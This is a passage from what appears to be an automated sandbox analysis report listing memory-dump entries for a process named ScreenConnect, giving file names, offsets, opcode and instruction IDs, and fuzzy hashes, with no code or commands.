                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be77f1d1c016a54f42b08aafbf3cd1ee077f48cb4c12ef1b74614d0729af9e2b
                                                                                                                            • Instruction ID: 4303bce5b8cd4ce1822014c4a85eaa804ebfd99432fafab084e7d2a91ec098d7
                                                                                                                            • Opcode Fuzzy Hash: be77f1d1c016a54f42b08aafbf3cd1ee077f48cb4c12ef1b74614d0729af9e2b
                                                                                                                            • Instruction Fuzzy Hash: B5312A34600615DFCB18CF69D88496A7BB6FF89324B1441A9EC12EF3A9D730EC55CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 81387e33a3ae10e221fb9e7a9329a63684d1adec4dd87546b2004b2010d3f60c
                                                                                                                            • Instruction ID: bddc1e07bc42dcc3547258954ed552fef9a3290b00a299c5c6888d9333c5598a
                                                                                                                            • Opcode Fuzzy Hash: 81387e33a3ae10e221fb9e7a9329a63684d1adec4dd87546b2004b2010d3f60c
                                                                                                                            • Instruction Fuzzy Hash: 7C411874A002198FDB14DF68D595AADBBF2AF49304F148469E806EB361CB38ED84CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ef65044b2da968f9f399eb0cb6df63b7cc166344167ac10034ae1ee027e7fab5
                                                                                                                            • Instruction ID: 1a7a4b9653b4dac458f9b87b56655f51133631645744e170fc81ab6af3075091
                                                                                                                            • Opcode Fuzzy Hash: ef65044b2da968f9f399eb0cb6df63b7cc166344167ac10034ae1ee027e7fab5
                                                                                                                            • Instruction Fuzzy Hash: 1631AF39A04615AFCB14DF98C4809ADBBB2FF88310F1580AADD45EB355DB75EC42CB94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03eed6582b93c233a65998ff285eec66414aef498ed9b76a379302cb1a9cee29
                                                                                                                            • Instruction ID: d65dfacd73383b945194614d041f38b33d54bf0681253050e11a912a141fcffb
                                                                                                                            • Opcode Fuzzy Hash: 03eed6582b93c233a65998ff285eec66414aef498ed9b76a379302cb1a9cee29
                                                                                                                            • Instruction Fuzzy Hash: C831CF316043548FCB11EB3CC59469D7FB2FF85310B1584AAD545EB262DB35EC86CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4eed4e3eee22b439ee00f7a9b8791c171589a6a8ac39475db7034f72b05c777a
                                                                                                                            • Instruction ID: 17e1e937dc085820c9e4dbce340d948033636cc98c17102f84ffe3cbb326384a
                                                                                                                            • Opcode Fuzzy Hash: 4eed4e3eee22b439ee00f7a9b8791c171589a6a8ac39475db7034f72b05c777a
                                                                                                                            • Instruction Fuzzy Hash: 5B21A3317042118FCB10DB6C9590A2EBFFABF85354B04846AED06CB369EF74DC058795
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7efa6acfc89d3b23bfa1b35ce513c08e97cc6410e2d32a9d10ad26fa3d10bdf4
                                                                                                                            • Instruction ID: f7da448ee41ca5f05828139aba9d46b88eed8ed590c6efd43abec725916872dd
                                                                                                                            • Opcode Fuzzy Hash: 7efa6acfc89d3b23bfa1b35ce513c08e97cc6410e2d32a9d10ad26fa3d10bdf4
                                                                                                                            • Instruction Fuzzy Hash: 5331DA34B00615DFDB14DFA9D498AAEBBB2BF89304F108059E905EB365DB30DC42DB41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d4272963454769de14a7e57b2868e640fe808bc546f2417c54ac2783facd9a4
                                                                                                                            • Instruction ID: afd0d35ccc07e583a75b10010829b277f2040b0fdeb43361f4aa479a0f16cd24
                                                                                                                            • Opcode Fuzzy Hash: 9d4272963454769de14a7e57b2868e640fe808bc546f2417c54ac2783facd9a4
                                                                                                                            • Instruction Fuzzy Hash: 18219131E0071ACBDB24CFA5D4082ADBBB2EF84315F24452AE916A7650EB706986CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad9b3a6d3a1550fa3988036f9c8d24f41f19808f9ce44094f4bf18e23c9e616f
                                                                                                                            • Instruction ID: 9b3af424f35aa94e53be7ecdd6fadc1f80041314e4fbb534187fc22eab92f6f7
                                                                                                                            • Opcode Fuzzy Hash: ad9b3a6d3a1550fa3988036f9c8d24f41f19808f9ce44094f4bf18e23c9e616f
                                                                                                                            • Instruction Fuzzy Hash: A03112B6900258AFCF10CF99D844ADEBBF5FF48314F10802AE919A7210C775A995CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d754cd91aebd90d830d59ec70e2b79c892598179ad424552506a5403c3acaf9
                                                                                                                            • Instruction ID: a53cdb7dc26e9be94994d965e5e58948fe3ad91173fc6546756e3f54f6ca3415
                                                                                                                            • Opcode Fuzzy Hash: 4d754cd91aebd90d830d59ec70e2b79c892598179ad424552506a5403c3acaf9
                                                                                                                            • Instruction Fuzzy Hash: 01216A357002118BCF10DAAD969092EBFEABF84754B14842AED1ACB368EF74DD0587A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3571560900.00000000018CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018CD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_18cd000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fd7fbec711172ef5482771feb3c24d22528b261fc06fcf7c97b289c8850c7729
                                                                                                                            • Instruction ID: 5cd59871f2ee6b3ede91e3f32dc49b80dbd714c98b815c30aebefcd80291b913
                                                                                                                            • Opcode Fuzzy Hash: fd7fbec711172ef5482771feb3c24d22528b261fc06fcf7c97b289c8850c7729
                                                                                                                            • Instruction Fuzzy Hash: 30212171500284DFCB01EF98D9C0B27BFA5EB88B14F20C27DE8098A256C336D546CAE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8a2b9b0a13576345e7d03ad96f0a2d8211331c232f38cd8cb6a5bb580acbb544
                                                                                                                            • Instruction ID: 9028ebdfe5a5709557c2fef52abb9b80337a361454c4a47a73625624cea1904f
                                                                                                                            • Opcode Fuzzy Hash: 8a2b9b0a13576345e7d03ad96f0a2d8211331c232f38cd8cb6a5bb580acbb544
                                                                                                                            • Instruction Fuzzy Hash: 4F318D316006058BCB28DF28E8C465A7B72FF84324F108269EC569F2D9EB30DE91CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e706b51d38a6760a875e60657a7db4bc86f24b61b80baf57578c32a2bce64916
                                                                                                                            • Instruction ID: 48027a4f022421e39a11ee4bc2dab341bb7a462739d80cf24e44044356361cc4
                                                                                                                            • Opcode Fuzzy Hash: e706b51d38a6760a875e60657a7db4bc86f24b61b80baf57578c32a2bce64916
                                                                                                                            • Instruction Fuzzy Hash: 9F3100B6900218AFDF10CF99D844ADEBBF5FB48310F10802AE919A7310C775A955CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ea7ab73a9fd48991a3d2eadd611a693edfbed947eb66914f19a55d43930b645
                                                                                                                            • Instruction ID: 5651f466f8f74d7aa00ea918205b5d074bf0c2f46e5843d406fd7c137e4f4d69
                                                                                                                            • Opcode Fuzzy Hash: 2ea7ab73a9fd48991a3d2eadd611a693edfbed947eb66914f19a55d43930b645
                                                                                                                            • Instruction Fuzzy Hash: EB213730B0121A8BDB14CF59C498AAEBBF6AF89355F248469E806E7390DF71DD41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 588a4d37583c36f98836bb0f93c6b3e51da4cadf2a4a5b55c636d8abf14750ae
                                                                                                                            • Instruction ID: 679a64c94698e6d84ff7381dccb421b5b47f2fceeb1964a768b3d13293d144f8
                                                                                                                            • Opcode Fuzzy Hash: 588a4d37583c36f98836bb0f93c6b3e51da4cadf2a4a5b55c636d8abf14750ae
                                                                                                                            • Instruction Fuzzy Hash: 1631F2B6900219AFCF10CF99D984ADEBBF5FF48310F10842AE919A7310C775A955CFA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 135dd5bf438e34b40e2fffd999a977939fc957563f106facd0c3905e8411561d
                                                                                                                            • Instruction ID: 545498722cd1239b91f44e419d8f4e84018edc0fa08aeef21badc51fad75e226
                                                                                                                            • Opcode Fuzzy Hash: 135dd5bf438e34b40e2fffd999a977939fc957563f106facd0c3905e8411561d
                                                                                                                            • Instruction Fuzzy Hash: D6213831A012158BCB14CF59C498AAEBBF6EF89351F148469EC06E7360DF71ED45CB94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c065b318724899e787e2857603d8f7717c57c748ddc58f5b778cbad4e0305ddc
                                                                                                                            • Instruction ID: e93c61f380359f3ad625dc2ffc6525fea8ff7ddfed22c8a1d07690e52d110513
                                                                                                                            • Opcode Fuzzy Hash: c065b318724899e787e2857603d8f7717c57c748ddc58f5b778cbad4e0305ddc
                                                                                                                            • Instruction Fuzzy Hash: 9C219D35604215ABCB14DF58C490AADBBB2FF48310F258099DC49AB395DB71FC82CB94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2b8c2e89d68417d64e7ca30fd8127a3947a6852b1a47a05d5405c42eb39dac68
                                                                                                                            • Instruction ID: d872f5281bb1697d0207e3a692525134aa77e61a66e39c1400c68539dc118213
                                                                                                                            • Opcode Fuzzy Hash: 2b8c2e89d68417d64e7ca30fd8127a3947a6852b1a47a05d5405c42eb39dac68
                                                                                                                            • Instruction Fuzzy Hash: 5611AE313002155BD708DB69DC81AAABBAAFB84304F10852DE905DF355EFB2ED4A8BD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8fdf056bd202c0cf6fb4cdc92236f0fae66e64a18c7dd943e7676c39c01f9e47
                                                                                                                            • Instruction ID: 911f0ca5fc88aa40ec7b004429743157371571a2f6dd6eb4aafd91c6e6dd3233
                                                                                                                            • Opcode Fuzzy Hash: 8fdf056bd202c0cf6fb4cdc92236f0fae66e64a18c7dd943e7676c39c01f9e47
                                                                                                                            • Instruction Fuzzy Hash: 4C11907A7002298FDB1CCE6CD484A9E7BA5FF88624F014166ED59EB211D7B1DC828B61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f3a45ec30203f56b2ff02e710d9900479eaaca07f0c673adfea44ea5d62cdd23
                                                                                                                            • Instruction ID: 4fb5016e4002aa027c12b2badef3cee62cc7e6c6c47ac8500bf98b57bc479937
                                                                                                                            • Opcode Fuzzy Hash: f3a45ec30203f56b2ff02e710d9900479eaaca07f0c673adfea44ea5d62cdd23
                                                                                                                            • Instruction Fuzzy Hash: 8C11A232E1071A9ACB00ABB9D8504EAF775FF95310F10C72AE955B7100FF70AA9587C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2681b2087083c3d2e8f3741ab86d423feebc01eced6228695472ce57e2249be
                                                                                                                            • Instruction ID: 94f964ba6e8ffc4899d5b2939feb43c1a457e57c586c5ae8a4249e29836bd924
                                                                                                                            • Opcode Fuzzy Hash: e2681b2087083c3d2e8f3741ab86d423feebc01eced6228695472ce57e2249be
                                                                                                                            • Instruction Fuzzy Hash: B011D071A04219DF8B04CF6AC8408AAFBF6FF893247148269E439D72E0E730ED01CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 260635688fcfba07403559b28e7ea9cf1710fc42d9b8526680efc6465a9cb066
                                                                                                                            • Instruction ID: 63e9f093becfdeffd878ff90dff2378cbdf2ad39fdd7b81a5bd6cb7cd0bbda38
                                                                                                                            • Opcode Fuzzy Hash: 260635688fcfba07403559b28e7ea9cf1710fc42d9b8526680efc6465a9cb066
                                                                                                                            • Instruction Fuzzy Hash: AB1160793406108FC719EB28D554A1AB7E2FF88710B05486DE916CB364DB75FC85CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1d1641d9cf55bb49a13c82067a5918d658f1f34cd4e53c207e46f851852fccec
                                                                                                                            • Instruction ID: b4c2f3af811c8caab714cdc50447e1abf0915546bb76f8d00e1308c4f487d270
                                                                                                                            • Opcode Fuzzy Hash: 1d1641d9cf55bb49a13c82067a5918d658f1f34cd4e53c207e46f851852fccec
                                                                                                                            • Instruction Fuzzy Hash: 59213BB1C102198FCB10CF99C5457EEBBF4EF48320F14852AD954A7290C7389985CF65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 24426f89939261f9f09de2541d877d397ba938d4d8e4086d11e5ef452d76ac36
                                                                                                                            • Instruction ID: 43463393ab58ad7b9adc3a99ff53f8690a07e595b7b2894a6988170db75c1863
                                                                                                                            • Opcode Fuzzy Hash: 24426f89939261f9f09de2541d877d397ba938d4d8e4086d11e5ef452d76ac36
                                                                                                                            • Instruction Fuzzy Hash: 062117B1C002598FDB10CF9AC445BEEFBF4EB48320F14842AE958A7240C778A985CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3571560900.00000000018CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018CD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_18cd000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction ID: 3a6f81ab5a407b1c83b38e7b6d4c2de8dc093cfeee01367f4531d85da11b1aa1
                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction Fuzzy Hash: D511DC76404280CFCB02DF54D9C4B16BF62FB88324F24C6ADD8094B257C33AD55ACBA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 053b967e9e5593ccdbe1ea811eefec1a1373ae26444e1aaea5b347f6af647a61
                                                                                                                            • Instruction ID: 7ba50ba7aebcbeb4c61bdefe1a69c05bad6eb4852e5c8df0c6b8e12cd4c154d4
                                                                                                                            • Opcode Fuzzy Hash: 053b967e9e5593ccdbe1ea811eefec1a1373ae26444e1aaea5b347f6af647a61
                                                                                                                            • Instruction Fuzzy Hash: 8011C27290E3E44FDB029FB8AC687D97F20EF43224F1901DBC9D18A0A2D2604689D756
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 788a905b8c36fd43165708726a64a419d44fc85052ad2dec010695504bcdd160
                                                                                                                            • Instruction ID: a44565daefa383a12b1734569387640973c0d8a30a3e639b59c47d7ece9bb646
                                                                                                                            • Opcode Fuzzy Hash: 788a905b8c36fd43165708726a64a419d44fc85052ad2dec010695504bcdd160
                                                                                                                            • Instruction Fuzzy Hash: B40165722042155F8705DB69E89199EBBA5FFC4220750C93EEA19DB250EE32ED098BD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b576f8583754941528b9dc0c569676b0063ee6febba5203a684379db54cc52ae
                                                                                                                            • Instruction ID: 89bdf1d395ff340b5f3eff64d390f7cbf644d1768b0029688613edbb9be130d0
                                                                                                                            • Opcode Fuzzy Hash: b576f8583754941528b9dc0c569676b0063ee6febba5203a684379db54cc52ae
                                                                                                                            • Instruction Fuzzy Hash: D011FE347002199FDB04DB58C9559ADBBF6AF8C304F158469E806EB365DB35ED41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cf513830856bd596e4ac924425b60e23265ec2e331cb61f2b1d1f9a432390fdb
                                                                                                                            • Instruction ID: 55657ba9eeea2f26f4321c9bb76d4bf471b62c7e97c40e66c7a8f2d0eec3b62a
                                                                                                                            • Opcode Fuzzy Hash: cf513830856bd596e4ac924425b60e23265ec2e331cb61f2b1d1f9a432390fdb
                                                                                                                            • Instruction Fuzzy Hash: 6F118232E203199FDF119B94D8015DDFBB9EF89314F10426AE908B7240DB715E858B90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 24cfcb9585d168cdaf632adc699697c7f412a5efea54219bae08275475e518ca
                                                                                                                            • Instruction ID: 37f34a3e8db13a4b3b34872daa3cd784e6a126586fa407bf6997e40f9ca46576
                                                                                                                            • Opcode Fuzzy Hash: 24cfcb9585d168cdaf632adc699697c7f412a5efea54219bae08275475e518ca
                                                                                                                            • Instruction Fuzzy Hash: 0B1149747402199FCF04CB58C5A0AADBBF2BF8C304F158469E906EB365CB39AC41CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5fc3c1794748ea89387e6b467d32e087c91feecd66f4b7742d9423240c57c0c6
                                                                                                                            • Instruction ID: 380ec3757e529eeec02dbfd8b5fdba8f1fea286ad9b2a5dba46d4bb698fb984b
                                                                                                                            • Opcode Fuzzy Hash: 5fc3c1794748ea89387e6b467d32e087c91feecd66f4b7742d9423240c57c0c6
                                                                                                                            • Instruction Fuzzy Hash: C911C075A00219CFCB14CF68D595A9DBBF2EF88325F148569E806EB360DB34AD85CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e5ea253e045bbd1d223fbc117e9deab1c02594286301b45be3aaee62d7d1a0d
                                                                                                                            • Instruction ID: 7fec32d7bf7e58ab079c2faf9a7ca50e5aa88dfe7f3050ca1801bef19965a233
                                                                                                                            • Opcode Fuzzy Hash: 5e5ea253e045bbd1d223fbc117e9deab1c02594286301b45be3aaee62d7d1a0d
                                                                                                                            • Instruction Fuzzy Hash: 721120B1C002198FCB10DF9AC845BDEFBF4FB88320F50842AD958A7240C378A984CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 48aeebd7d0290de118828f04cb4fde043f27440dc531cff45f580d0bf2ab39a4
                                                                                                                            • Instruction ID: 2a42a6c3c206bed5335202690db791caab2d375b20737dfdbe4169a15b4d967c
                                                                                                                            • Opcode Fuzzy Hash: 48aeebd7d0290de118828f04cb4fde043f27440dc531cff45f580d0bf2ab39a4
                                                                                                                            • Instruction Fuzzy Hash: B91100B5C002198FCB10CF9AC5457DEBBF4BB48320F54842AD959A7240D378A985CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
